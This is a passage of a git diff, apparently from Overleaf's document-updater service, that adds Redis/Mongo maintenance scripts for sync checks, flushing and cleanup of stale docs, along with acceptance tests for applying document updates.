'127.0.0.1'}:3016/project/${projectId}/doc/${docId}/peek`, + timeout: 60 * 1000, + json: true, + }, + (err, res, body) => { + if (err) return reject(err) + const { statusCode } = res + if (statusCode !== 200) { + return reject( + new OError('fallback request to docstore failed', { + statusCode, + body, + }) + ) + } + resolve(body) + } + ) + }) + const deletedDocName = await new Promise((resolve, reject) => { + request( + { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016/project/${projectId}/doc-deleted`, + timeout: 60 * 1000, + json: true, + }, + (err, res, body) => { + if (err) return reject(err) + const { statusCode } = res + if (statusCode !== 200) { + return reject( + new OError('list deleted docs request to docstore failed', { + statusCode, + body, + }) + ) + } + resolve(body.find(doc => doc._id === docId)?.name) + } + ) + }) + if (docstoreDoc.deleted && deletedDocName) { + return { + ...docstoreDoc, + pathname: deletedDocName, + } + } + return { + ...docstoreDoc, + pathname: `/partially-deleted-doc-with-unknown-name-and-id-${docId}.txt`, + partiallyDeleted: true, + } +} + +/** + * @param {string} projectId + * @param {string} docId + * @return {Promise<boolean>} + */ +async function processDoc(projectId, docId) { + const redisDoc = /** @type Doc */ await RedisManager.promises.getDoc( + projectId, + docId + ) + const mongoDoc = /** @type Doc */ await getDocFromMongo(projectId, docId) + + if (mongoDoc.partiallyDeleted) { + if (AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA) { + console.log( + `Found partially deleted doc ${docId} in project ${projectId}: fixing metadata` + ) + await fixPartiallyDeletedDocMetadata(projectId, docId, redisDoc.pathname) + } else { + console.log( + `Found partially deleted doc ${docId} in project ${projectId}: use AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA=true to fix metadata` + ) + } + } + + if (mongoDoc.version < redisDoc.version) { + // mongo is behind, we can flush to mongo when all docs are processed. + return false + } + + mongoDoc.snapshot = mongoDoc.lines.join('\n') + redisDoc.snapshot = redisDoc.lines.join('\n') + if (!mongoDoc.ranges) mongoDoc.ranges = {} + if (!redisDoc.ranges) redisDoc.ranges = {} + + const sameLines = mongoDoc.snapshot === redisDoc.snapshot + const sameRanges = _.isEqual(mongoDoc.ranges, redisDoc.ranges) + if (sameLines && sameRanges) { + if (mongoDoc.version > redisDoc.version) { + // mongo is ahead, technically out of sync, but practically the content is identical + if (AUTO_FIX_VERSION_MISMATCH) { + console.log( + `Fixing out of sync doc version for doc ${docId} in project ${projectId}: mongo=${mongoDoc.version} > redis=${redisDoc.version}` + ) + await updateDocVersionInRedis(docId, redisDoc, mongoDoc) + return false + } else { + console.error( + `Detected out of sync redis and mongo version for doc ${docId} in project ${projectId}, auto-fixable via AUTO_FIX_VERSION_MISMATCH=true` + ) + return true + } + } else { + // same lines, same ranges, same version + return false + } + } + + const dir = Path.join(FOLDER, projectId, docId) + console.error( + `Detected out of sync redis and mongo content for doc ${docId} in project ${projectId}` + ) + if (!WRITE_CONTENT) return true + + console.log(`pathname: ${mongoDoc.pathname}`) + if (mongoDoc.pathname !== redisDoc.pathname) { + console.log(`pathname redis: ${redisDoc.pathname}`) + } + console.log(`mongo version: ${mongoDoc.version}`) + console.log(`redis version: ${redisDoc.version}`) + + await fs.promises.mkdir(dir, { recursive: true }) + + if (sameLines) { + console.log('mongo lines match redis lines') + } else { + console.log( + `mongo lines and redis lines out of sync, writing content into ${dir}` + ) + await fs.promises.writeFile( + Path.join(dir, 'mongo-snapshot.txt'), + mongoDoc.snapshot + ) + await fs.promises.writeFile( + Path.join(dir, 'redis-snapshot.txt'), + redisDoc.snapshot + ) + } + if (sameRanges) { + console.log('mongo ranges match redis ranges') + } else { + console.log( + `mongo ranges and redis ranges out of sync, writing content into ${dir}` + ) + await fs.promises.writeFile( + Path.join(dir, 'mongo-ranges.json'), + JSON.stringify(mongoDoc.ranges) + ) + await fs.promises.writeFile( + Path.join(dir, 'redis-ranges.json'), + JSON.stringify(redisDoc.ranges) + ) + } + console.log('---') + return true +} + +/** + * @param {string} projectId + * @return {Promise<number>} + */ +async function processProject(projectId) { + const docIds = await RedisManager.promises.getDocIdsInProject(projectId) + + let outOfSync = 0 + for (const docId of docIds) { + let lastErr + for (let i = 0; i <= RETRIES; i++) { + try { + if (await processDoc(projectId, docId)) { + outOfSync++ + } + break + } catch (err) { + lastErr = err + } + } + if (lastErr) { + throw OError.tag(lastErr, 'process doc', { docId }) + } + } + if (outOfSync === 0 && FLUSH_IN_SYNC_PROJECTS) { + try { + await ProjectManager.promises.flushAndDeleteProjectWithLocks( + projectId, + {} + ) + } catch (err) { + throw OError.tag(err, 'flush project with only in-sync docs') + } + } + return outOfSync +} + +/** + * @param {Set<string>} processed + * @param {Set<string>} outOfSync + * @return {Promise<{perIterationOutOfSync: number, done: boolean}>} + */ +async function scanOnce(processed, outOfSync) { + const projectIds = await ProjectFlusher.promises.flushAllProjects({ + limit: LIMIT, + dryRun: true, + }) + + let perIterationOutOfSync = 0 + for (const projectId of projectIds) { + if (processed.has(projectId)) continue + processed.add(projectId) + + let perProjectOutOfSync = 0 + try { + perProjectOutOfSync = await processProject(projectId) + } catch (err) { + throw OError.tag(err, 'process project', { projectId }) + } + perIterationOutOfSync += perProjectOutOfSync + if (perProjectOutOfSync > 0) { + outOfSync.add(projectId) + } + } + + return { perIterationOutOfSync, done: projectIds.length < LIMIT } +} + +/** + * @return {Promise<number>} + */ +async function main() { + if (!WRITE_CONTENT) { + console.warn() + console.warn( + ` Use WRITE_CONTENT=true to write the content of out of sync docs to FOLDER=${FOLDER}` + ) + console.warn() + } else { + console.log( + `Writing content for projects with out of sync docs into FOLDER=${FOLDER}` + ) + await fs.promises.mkdir(FOLDER, { recursive: true }) + const existing = await fs.promises.readdir(FOLDER) + if (existing.length > 0) { + console.warn() + console.warn( + ` Found existing entries in FOLDER=${FOLDER}. Please delete or move these before running the script again.` + ) + console.warn() + return 101 + } + } + if (LIMIT < 100) { + console.warn() + console.warn( + ` Using small LIMIT=${LIMIT}, this can take a while to SCAN in a large redis database.` + ) + console.warn() + } + + const processed = new Set() + const outOfSyncProjects = new Set() + let totalOutOfSyncDocs = 0 + while (true) { + const before = processed.size + const { perIterationOutOfSync, done } = await scanOnce( + processed, + outOfSyncProjects + ) + totalOutOfSyncDocs += perIterationOutOfSync + console.log(`Processed ${processed.size} projects`) + console.log( + `Found ${ + outOfSyncProjects.size + } projects with ${totalOutOfSyncDocs} out of sync docs: ${JSON.stringify( + Array.from(outOfSyncProjects) + )}` + ) + if (done) { + console.log('Finished iterating all projects in redis') + break + } + if (processed.size === before) { + console.error( + `Found too many un-flushed projects (LIMIT=${LIMIT}). Please fix the reported projects first, then try again.` + ) + if (!FLUSH_IN_SYNC_PROJECTS) { + console.error( + 'Use FLUSH_IN_SYNC_PROJECTS=true to flush projects that have been checked.' + ) + } + return 2 + } + } + return totalOutOfSyncDocs > 0 ? 1 : 0 +} + +main() + .then(code => { + process.exit(code) + }) + .catch(error => { + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + process.exit(1) + }) diff --git a/services/document-updater/scripts/expire_docops.js b/services/document-updater/scripts/expire_docops.js new file mode 100644 index 0000000..463509e --- /dev/null +++ b/services/document-updater/scripts/expire_docops.js @@ -0,0 +1,65 @@ +const Settings = require('@overleaf/settings') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +let keys = Settings.redis.documentupdater.key_schema +const async = require('async') +const RedisManager = require('../app/js/RedisManager') + +const getKeysFromNode = function (node, pattern, callback) { + let cursor = 0 // redis iterator + const keySet = {} // use hash to avoid duplicate results + // scan over all keys looking for pattern + const doIteration = () => + node.scan(cursor, 'MATCH', pattern, 'COUNT', 1000, function (error, reply) { + if (error) { + return callback(error) + } + ;[cursor, keys] = reply + console.log('SCAN', keys.length) + for (const key of keys) { + keySet[key] = true + } + if (cursor === '0') { + // note redis returns string result not numeric + return callback(null, Object.keys(keySet)) + } else { + return doIteration() + } + }) + return doIteration() +} + +const getKeys = function (pattern, callback) { + const nodes = (typeof rclient.nodes === 'function' + ? rclient.nodes('master') + : undefined) || [rclient] + console.log('GOT NODES', nodes.length) + const doKeyLookupForNode = (node, cb) => getKeysFromNode(node, pattern, cb) + return async.concatSeries(nodes, doKeyLookupForNode, callback) +} + +const expireDocOps = callback => + getKeys(keys.docOps({ doc_id: '*' }), (error, keys) => { + if (error) return callback(error) + async.mapSeries( + keys, + function (key, cb) { + console.log(`EXPIRE ${key} ${RedisManager.DOC_OPS_TTL}`) + return rclient.expire(key, RedisManager.DOC_OPS_TTL, cb) + }, + callback + ) + }) + +setTimeout( + () => + // Give redis a chance to connect + expireDocOps(function (error) { + if (error) { + throw error + } + return process.exit() + }), + 1000 +) diff --git a/services/document-updater/scripts/fix_docs_with_empty_pathnames.js b/services/document-updater/scripts/fix_docs_with_empty_pathnames.js new file mode 100644 index 0000000..e3e0341 --- /dev/null +++ b/services/document-updater/scripts/fix_docs_with_empty_pathnames.js @@ -0,0 +1,79 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const keys = Settings.redis.documentupdater.key_schema +const ProjectFlusher = require('app/js/ProjectFlusher') +const DocumentManager = require('app/js/DocumentManager') +const util = require('node:util') +const flushAndDeleteDocWithLock = util.promisify( + DocumentManager.flushAndDeleteDocWithLock +) + +async function flushAndDeleteDocs(dockeys, options) { + const docIds = ProjectFlusher._extractIds(dockeys) + for (const docId of docIds) { + const pathname = await rclient.get(keys.pathname({ doc_id: docId })) + if (!pathname) { + const projectId = await rclient.get(keys.projectKey({ doc_id: docId })) + if (!projectId) { + // await deleteDanglingDoc(projectId, docId, pathname, options) + logger.info( + { projectId, docId, pathname }, + 'skipping doc with empty pathname and project id' + ) + } else { + await flushAndDeleteDoc(projectId, docId, pathname, options) + } + } + } +} + +async function flushAndDeleteDoc(projectId, docId, pathname, options) { + if (options.dryRun) { + logger.info( + { projectId, docId, pathname }, + 'dry run mode - would flush doc with empty pathname' + ) + return + } + logger.info( + { projectId, docId, pathname }, + 'flushing doc with empty pathname' + ) + try { + await flushAndDeleteDocWithLock(projectId, docId, {}) + } catch (err) { + logger.error( + { projectId, docId, pathname, err }, + 'error flushing and deleting doc without pathname' + ) + } +} + +async function cleanUpDocs(options) { + logger.info({ options }, 'cleaning up docs without pathnames') + let cursor = 0 + do { + const [newCursor, doclinesKeys] = await rclient.scan( + cursor, + 'MATCH', + keys.docLines({ doc_id: '*' }), + 'COUNT', + options.limit + ) + await flushAndDeleteDocs(doclinesKeys, options) + cursor = newCursor + } while (cursor !== '0') +} + +cleanUpDocs({ limit: 1000, dryRun: process.env.DRY_RUN !== 'false' }) + .then(result => { + rclient.quit() + console.log('DONE') + }) + .catch(function (error) { + console.error(error) + process.exit(1) + }) diff --git a/services/document-updater/scripts/fix_docs_with_missing_project.js b/services/document-updater/scripts/fix_docs_with_missing_project.js new file mode 100644 index 0000000..d302212 --- /dev/null +++ b/services/document-updater/scripts/fix_docs_with_missing_project.js @@ -0,0 +1,87 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const keys = Settings.redis.documentupdater.key_schema +const ProjectFlusher = require('../app/js/ProjectFlusher') +const DocumentManager = require('../app/js/DocumentManager') +const { mongoClient, db, ObjectId } = require('../app/js/mongodb') +const util = require('node:util') +const flushAndDeleteDocWithLock = util.promisify( + DocumentManager.flushAndDeleteDocWithLock +) + +async function fixDocsWithMissingProjectIds(dockeys, options) { + const docIds = ProjectFlusher._extractIds(dockeys) + for (const docId of docIds) { + const projectId = await rclient.get(keys.projectKey({ doc_id: docId })) + logger.debug({ docId, projectId }, 'checking doc') + if (!projectId) { + try { + await insertMissingProjectId(docId, options) + } catch (err) { + logger.error({ docId, err }, 'error fixing doc without project id') + } + } + } +} + +async function insertMissingProjectId(docId, options) { + const doc = await db.docs.findOne({ _id: ObjectId(docId) }) + if (!doc) { + logger.warn({ docId }, 'doc not found in mongo') + return + } + if (!doc.project_id) { + logger.error({ docId }, 'doc does not have project id in mongo') + return + } + logger.debug({ docId, doc }, 'found doc') + const projectIdFromMongo = doc.project_id.toString() + if (options.dryRun) { + logger.info( + { projectIdFromMongo, docId }, + 'dry run mode - would insert project id in redis' + ) + return + } + // set the project id for this doc + await rclient.set(keys.projectKey({ doc_id: docId }), projectIdFromMongo) + logger.debug({ docId, projectIdFromMongo }, 'inserted project id in redis') + if (projectIdFromMongo) { + await flushAndDeleteDocWithLock(projectIdFromMongo, docId, {}) + logger.info( + { docId, projectIdFromMongo }, + 'fixed doc with empty project id' + ) + } + return projectIdFromMongo +} + +async function findAndProcessDocs(options) { + logger.info({ options }, 'fixing docs with missing projcct id') + let cursor = 0 + do { + const [newCursor, doclinesKeys] = await rclient.scan( + cursor, + 'MATCH', + keys.docLines({ doc_id: '*' }), + 'COUNT', + options.limit + ) + await fixDocsWithMissingProjectIds(doclinesKeys, options) + cursor = newCursor + } while (cursor !== '0') +} + +findAndProcessDocs({ limit: 1000, dryRun: process.env.DRY_RUN !== 'false' }) + .then(result => { + rclient.quit() + mongoClient.close() + console.log('DONE') + }) + .catch(function (error) { + console.error(error) + process.exit(1) + }) diff --git a/services/document-updater/scripts/flush_all.js b/services/document-updater/scripts/flush_all.js new file mode 100644 index 0000000..68bd831 --- /dev/null +++ b/services/document-updater/scripts/flush_all.js @@ -0,0 +1,54 @@ +const ProjectFlusher = require('../app/js/ProjectFlusher') +const minimist = require('minimist') + +async function main() { + const argv = minimist(process.argv.slice(2), { + default: { + limit: 100000, + concurrency: 5, + 'dry-run': false, + }, + boolean: ['dry-run', 'help'], + alias: { h: 'help', n: 'dry-run', j: 'concurrency' }, + }) + + if (argv.help) { + console.log(` +Usage: node scripts/flush_all.js [options] + +Options: + --limit Number of projects to flush (default: 100000) + --concurrency, -j Number of concurrent flush operations (default: 5) + --dryRun, -n Perform a dry run without making any changes (default: false) + --help, -h Show this help message + `) + process.exit(0) + } + + const options = { + limit: argv.limit, + concurrency: argv.concurrency, + dryRun: argv['dry-run'], + } + console.log('Flushing all projects with options:', options) + + return await new Promise((resolve, reject) => { + ProjectFlusher.flushAllProjects(options, err => { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) +} + +main() + .then(() => { + console.log('Done flushing all projects') + process.exit(0) + }) + .catch(error => { + console.error('There was an error flushing all projects', { error }) + process.exit(1) + }) diff --git a/services/document-updater/scripts/remove_deleted_docs.js b/services/document-updater/scripts/remove_deleted_docs.js new file mode 100644 index 0000000..a698071 --- /dev/null +++ b/services/document-updater/scripts/remove_deleted_docs.js @@ -0,0 +1,161 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const keys = Settings.redis.documentupdater.key_schema +const ProjectFlusher = require('../app/js/ProjectFlusher') +const RedisManager = require('../app/js/RedisManager') +const { mongoClient, db, ObjectId } = require('../app/js/mongodb') +const util = require('node:util') +const getDoc = util.promisify((projectId, docId, cb) => + RedisManager.getDoc(projectId, docId, (err, ...args) => cb(err, args)) +) +const removeDocFromMemory = util.promisify(RedisManager.removeDocFromMemory) + +const summary = { totalDocs: 0, deletedDocs: 0, skippedDocs: 0 } + +async function removeDeletedDocs(dockeys, options) { + const docIds = ProjectFlusher._extractIds(dockeys) + for (const docId of docIds) { + summary.totalDocs++ + const docCount = await db.docs.find({ _id: new ObjectId(docId) }).count() + if (!docCount) { + try { + await removeDeletedDoc(docId, options) + } catch (err) { + logger.error({ docId, err }, 'error removing deleted doc') + } + } + } +} + +async function removeDeletedDoc(docId, options) { + const projectId = await rclient.get(keys.projectKey({ doc_id: docId })) + + const [ + docLines, + version, + ranges, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + ] = await getDoc(projectId, docId) + + const project = await db.projects.findOne({ _id: new ObjectId(projectId) }) + + let status + + if (project) { + const projectJSON = JSON.stringify(project.rootFolder) + const containsDoc = projectJSON.indexOf(docId) !== -1 + if (containsDoc) { + logger.warn( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + }, + 'refusing to delete doc, project contains docId' + ) + summary.skippedDocs++ + return + } else { + logger.warn( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + }, + 'refusing to delete doc, project still exists' + ) + summary.skippedDocs++ + return + } + } else { + status = 'projectDeleted' + } + summary.deletedDocs++ + if (options.dryRun) { + logger.info( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + status, + summary, + }, + 'dry run mode - would remove doc from redis' + ) + return + } + removeDocFromMemory(projectId, docId) + logger.info( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + status, + summary, + }, + 'removed doc from redis' + ) +} + +async function findAndProcessDocs(options) { + logger.info({ options }, 'removing deleted docs') + let cursor = 0 + do { + const [newCursor, doclinesKeys] = await rclient.scan( + cursor, + 'MATCH', + keys.docLines({ doc_id: '*' }), + 'COUNT', + options.limit + ) + await removeDeletedDocs(doclinesKeys, options) + cursor = newCursor + } while (cursor !== '0') +} + +findAndProcessDocs({ limit: 1000, dryRun: process.env.DRY_RUN !== 'false' }) + .then(result => { + rclient.quit() + mongoClient.close() + console.log('DONE') + process.exit(0) + }) + .catch(function (error) { + console.error(error) + process.exit(1) + }) diff --git a/services/document-updater/test/acceptance/js/ApplyingUpdatesToADocTests.js b/services/document-updater/test/acceptance/js/ApplyingUpdatesToADocTests.js new file mode 100644 index 0000000..73e22aa --- /dev/null +++ b/services/document-updater/test/acceptance/js/ApplyingUpdatesToADocTests.js @@ -0,0 +1,723 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const async = require('async') +const Settings = require('@overleaf/settings') +const rclientProjectHistory = require('@overleaf/redis-wrapper').createClient( + Settings.redis.project_history +) +const rclientDU = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const Keys = Settings.redis.documentupdater.key_schema +const ProjectHistoryKeys = Settings.redis.project_history.key_schema + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Applying updates to a doc', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.op = { + i: 'one and a half\n', + p: 4, + } + this.update = { + doc: this.doc_id, + op: [this.op], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + DocUpdaterApp.ensureRunning(done) + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + sinon.spy(MockWebApi, 'getDocument') + this.startTime = Date.now() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should load the document from the web API', function () { + MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should push the applied updates to the project history changes api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error != null) { + throw error + } + JSON.parse(updates[0]).op.should.deep.equal([this.op]) + done() + } + ) + }) + + it('should set the first op timestamp', function (done) { + rclientProjectHistory.get( + ProjectHistoryKeys.projectHistoryFirstOpTimestamp({ + project_id: this.project_id, + }), + (error, result) => { + if (error != null) { + throw error + } + result = parseInt(result, 10) + result.should.be.within(this.startTime, Date.now()) + this.firstOpTimestamp = result + done() + } + ) + }) + + it('should yield last updated time', function (done) { + DocUpdaterClient.getProjectLastUpdatedAt( + this.project_id, + (error, res, body) => { + if (error != null) { + throw error + } + res.statusCode.should.equal(200) + body.lastUpdatedAt.should.be.within(this.startTime, Date.now()) + done() + } + ) + }) + + it('should yield no last updated time for another project', function (done) { + DocUpdaterClient.getProjectLastUpdatedAt( + DocUpdaterClient.randomId(), + (error, res, body) => { + if (error != null) { + throw error + } + res.statusCode.should.equal(200) + body.should.deep.equal({}) + done() + } + ) + }) + + describe('when sending another update', function () { + before(function (done) { + this.timeout(10000) + this.second_update = Object.assign({}, this.update) + this.second_update.v = this.version + 1 + this.secondStartTime = Date.now() + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.second_update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) done(error) + doc.lines.should.deep.equal([ + 'one', + 'one and a half', + 'one and a half', + 'two', + 'three', + ]) + done() + } + ) + }) + + it('should not change the first op timestamp', function (done) { + rclientProjectHistory.get( + ProjectHistoryKeys.projectHistoryFirstOpTimestamp({ + project_id: this.project_id, + }), + (error, result) => { + if (error != null) { + throw error + } + result = parseInt(result, 10) + result.should.equal(this.firstOpTimestamp) + done() + } + ) + }) + + it('should yield last updated time', function (done) { + DocUpdaterClient.getProjectLastUpdatedAt( + this.project_id, + (error, res, body) => { + if (error != null) { + throw error + } + res.statusCode.should.equal(200) + body.lastUpdatedAt.should.be.within( + this.secondStartTime, + Date.now() + ) + done() + } + ) + }) + }) + }) + + describe('when the document is loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should not need to call the web api', function () { + MockWebApi.getDocument.called.should.equal(false) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should push the applied updates to the project history changes api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) return done(error) + JSON.parse(updates[0]).op.should.deep.equal([this.op]) + done() + } + ) + }) + }) + + describe('when the document is loaded and is using project-history only', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should push the applied updates to the project history changes api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) return done(error) + JSON.parse(updates[0]).op.should.deep.equal([this.op]) + done() + } + ) + }) + }) + + describe('when the document has been deleted', function () { + describe('when the ops come in a single linear order', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + const lines = ['', '', ''] + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines, + version: 0, + }) + this.updates = [ + { doc_id: this.doc_id, v: 0, op: [{ i: 'h', p: 0 }] }, + { doc_id: this.doc_id, v: 1, op: [{ i: 'e', p: 1 }] }, + { doc_id: this.doc_id, v: 2, op: [{ i: 'l', p: 2 }] }, + { doc_id: this.doc_id, v: 3, op: [{ i: 'l', p: 3 }] }, + { doc_id: this.doc_id, v: 4, op: [{ i: 'o', p: 4 }] }, + { doc_id: this.doc_id, v: 5, op: [{ i: ' ', p: 5 }] }, + { doc_id: this.doc_id, v: 6, op: [{ i: 'w', p: 6 }] }, + { doc_id: this.doc_id, v: 7, op: [{ i: 'o', p: 7 }] }, + { doc_id: this.doc_id, v: 8, op: [{ i: 'r', p: 8 }] }, + { doc_id: this.doc_id, v: 9, op: [{ i: 'l', p: 9 }] }, + { doc_id: this.doc_id, v: 10, op: [{ i: 'd', p: 10 }] }, + ] + this.my_result = ['hello world', '', ''] + done() + }) + + it('should be able to continue applying updates when the project has been deleted', function (done) { + let update + const actions = [] + for (update of this.updates.slice(0, 6)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + actions.push(callback => + DocUpdaterClient.deleteDoc(this.project_id, this.doc_id, callback) + ) + for (update of this.updates.slice(6)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + + async.series(actions, error => { + if (error != null) { + throw error + } + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.my_result) + done() + } + ) + }) + }) + + it('should store the doc ops in the correct order', function (done) { + rclientDU.lrange( + Keys.docOps({ doc_id: this.doc_id }), + 0, + -1, + (error, updates) => { + if (error) return done(error) + updates = updates.map(u => JSON.parse(u)) + for (let i = 0; i < this.updates.length; i++) { + const appliedUpdate = this.updates[i] + appliedUpdate.op.should.deep.equal(updates[i].op) + } + done() + } + ) + }) + }) + + describe('when older ops come in after the delete', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + const lines = ['', '', ''] + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines, + version: 0, + }) + this.updates = [ + { doc_id: this.doc_id, v: 0, op: [{ i: 'h', p: 0 }] }, + { doc_id: this.doc_id, v: 1, op: [{ i: 'e', p: 1 }] }, + { doc_id: this.doc_id, v: 2, op: [{ i: 'l', p: 2 }] }, + { doc_id: this.doc_id, v: 3, op: [{ i: 'l', p: 3 }] }, + { doc_id: this.doc_id, v: 4, op: [{ i: 'o', p: 4 }] }, + { doc_id: this.doc_id, v: 0, op: [{ i: 'world', p: 1 }] }, + ] + this.my_result = ['hello', 'world', ''] + done() + }) + + it('should be able to continue applying updates when the project has been deleted', function (done) { + let update + const actions = [] + for (update of this.updates.slice(0, 5)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + actions.push(callback => + DocUpdaterClient.deleteDoc(this.project_id, this.doc_id, callback) + ) + for (update of this.updates.slice(5)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + + async.series(actions, error => { + if (error != null) { + throw error + } + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.my_result) + done() + } + ) + }) + }) + }) + }) + + describe('with a broken update', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + this.broken_update = { + doc_id: this.doc_id, + v: this.version, + op: [{ d: 'not the correct content', p: 0 }], + } + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + DocUpdaterClient.subscribeToAppliedOps( + (this.messageCallback = sinon.stub()) + ) + + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.broken_update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.lines) + done() + } + ) + }) + + it('should send a message with an error', function () { + this.messageCallback.called.should.equal(true) + const [channel, message] = this.messageCallback.args[0] + channel.should.equal('applied-ops') + JSON.parse(message).should.deep.include({ + project_id: this.project_id, + doc_id: this.doc_id, + error: 'Delete component does not match', + }) + }) + }) + + describe('when there is no version in Mongo', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + }) + + const update = { + doc: this.doc_id, + op: this.update.op, + v: 0, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should update the doc (using version = 0)', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + 